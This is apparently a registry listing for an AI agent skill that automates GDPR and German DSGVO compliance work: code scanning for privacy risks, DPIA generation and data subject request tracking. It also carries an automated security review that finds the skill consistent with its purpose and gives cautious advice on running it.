GDPR and German DSGVO compliance automation. Scans codebases for privacy risks, generates DPIA documentation, tracks data subject rights requests. Use for GDPR compliance assessments, privacy audits, data protection planning, DPIA generation, and data subject rights management.
Security Analysis
high confidenceThe skill's files and runtime instructions match its stated purpose (code scanning, DPIA generation, and DSR tracking); nothing requires unrelated credentials or installs, but it reads and writes local project files and stores request/reports on disk so you should review storage and run it in a controlled environment.
Name/description describe scanning, DPIA generation, and data-subject request tracking, and the repository includes three scripts and reference docs that implement exactly those features. There are no unexpected required env vars, binaries, or external services declared.
SKILL.md instructs the agent to run the included scripts against a project directory, produce JSON/markdown outputs, and manage DSRs. That scope is appropriate for a GDPR/DSGVO compliance tool. Note: the compliance checker intentionally scans many file types (including .env/.config) and the workflows direct the agent to 'gather data from systems' — behavior consistent with the tool's purpose but capable of reading sensitive files in the scanned project.
No install spec or external downloads are present; this is an instruction-plus-scripts package. All code is bundled with the skill (no runtime fetching from untrusted URLs), so there is no high-risk install mechanism.
The skill requests no environment variables or credentials. The code does scan configuration and .env-like files for patterns (expected for compliance analysis) and writes reports to disk — this is proportional to its purpose but means secrets found in scanned projects may appear in outputs.
The skill is not always-enabled and does not request elevated agent privileges. It persists data locally (dsr_requests.json, generated reports like report.json or dpia_report.md). That persistence is normal for a tracker/reporting tool but you should be aware files are created in the working directory and are not encrypted by the scripts.
Guidance
This skill appears to implement what it claims, but before running it: (1) review the bundled scripts yourself to confirm there are no network exfiltration calls (the provided sources show only local file I/O and regex scanning); (2) run the scanner in an isolated environment (container or VM) so it cannot access secrets outside the intended project; (3) be aware reports and the tracker store data on disk (e.g., dsr_requests.json, report.json, dpia_report.md) — secure or encrypt those outputs if they may contain personal data; (4) if you plan to run it in CI, restrict repository access and ensure generated artifacts are stored in protected locations; (5) if you need stronger assurances (e.g., network activity audit), run the tool in a network-restricted environment and monitor outbound traffic. If you want, I can produce a short checklist to securely run the tool or scan the scripts for specific network/call patterns.
Latest Release
v1.0.0
Initial release of GDPR/DSGVO Expert – automation tools and guidance for EU and German data protection compliance. - Scans codebases for GDPR privacy risks and provides compliance scores with actionable recommendations. - Generates Data Protection Impact Assessments (DPIA) with markdown reports based on Art. 35 requirements. - Tracks data subject rights requests (access, rectification, erasure, etc.) with deadline alerts and response templates. - Includes step-by-step workflows for compliance checks, DPIA generation, and German BDSG-specific requirements. - Provides comprehensive reference guides for GDPR, BDSG, and DPIA methodologies.
More by @alirezarezvani
Published by @alirezarezvani on ClawHub
